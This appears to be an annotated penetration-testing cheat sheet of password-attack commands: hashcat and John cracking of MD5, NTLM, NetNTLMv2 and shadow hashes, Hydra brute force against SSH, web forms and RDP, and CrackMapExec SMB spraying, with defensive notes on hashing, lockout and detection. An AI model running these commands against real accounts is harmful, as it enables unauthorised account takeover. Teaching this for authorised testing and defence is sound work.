
Password Attacks

Hashcat

# Identify hash type
# Prints candidate modes only; several formats share a length and charset,
# so confirm the type against the system the hash came from.
hashcat --identify hash.txt

# Dictionary attack (MD5)
# -m 0 is raw, unsalted MD5. Fast unsalted hashes are what make wordlist runs
# cheap; stored passwords belong in a salted, slow KDF (bcrypt, scrypt, Argon2, PBKDF2).
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt

# Dictionary + rules
# -r applies each mangling rule in the file to every wordlist entry, so simple
# variations of a leaked password are covered as well as the password itself.
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# NTLM
# -m 1000: NT hash (unsalted MD4 of the UTF-16LE password), so identical
# passwords produce identical hashes across accounts.
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt

# NTLMv2
# -m 5600: NetNTLMv2 challenge-response taken from a network authentication
# exchange, not a stored hash; its resistance depends entirely on password strength.
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

# Resume session
# Restores the default session; a run started with --session <name> needs the
# same --session on restore. Recovered plaintexts are kept in hashcat's potfile,
# which should be handled as sensitive engagement data.
hashcat --restore

John the Ripper

# Auto-detect and crack
# john chooses the format itself; when a hash matches several formats it warns
# and picks one, so a wrong guess produces no results. Pass --format once the
# type is known.
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Show cracked passwords
# Reads earlier results from john's pot file instead of cracking again. The pot
# file holds plaintext passwords; store and dispose of it as sensitive data.
john hash.txt --show

# Crack /etc/shadow
# shadow.txt is a saved copy of /etc/shadow. The $id$ prefix of each entry names
# the crypt(3) scheme; these are salted and iterated, so guessing is far slower
# than against raw MD5 or NTLM.
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt

Hydra — Online Brute Force

# SSH
# Online guessing: every candidate is a real login attempt against the live
# service, so it writes an authentication-failure log entry and counts toward
# lockout. Key-only SSH authentication and rate limiting remove this exposure.
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<target>

# HTTP POST form
# The quoted argument has three colon-separated fields: request path, POST body
# with ^USER^/^PASS^ placeholders, and a string that appears in a failed-login
# response. If that string does not match the application's real failure page,
# every attempt is reported as a valid login (false positives).
hydra -l admin -P /usr/share/wordlists/rockyou.txt <target> http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"

# RDP
# Failed attempts are recorded on the Windows host as logon failures
# (Security event ID 4625); an account lockout policy applies to these attempts.
hydra -l administrator -P passwords.txt rdp://<target>

Credential Spraying

# CrackMapExec — SMB spray
# Tries the single password 'Password123' for every name in users.txt;
# --continue-on-success keeps going after the first valid login.
# Detection: one source failing logon for many distinct accounts in a short
# window. Alert on username fan-out per source, not only per-account failure counts.
crackmapexec smb <target_range> -u users.txt -p 'Password123' --continue-on-success

# Spray and check for local admin
# --local-auth authenticates against the host's local account database instead
# of the domain. The check only matters where the same local administrator
# password is reused across hosts; unique per-host passwords (e.g. Windows LAPS)
# remove that exposure.
crackmapexec smb <target> -u administrator -p 'Password123' --local-auth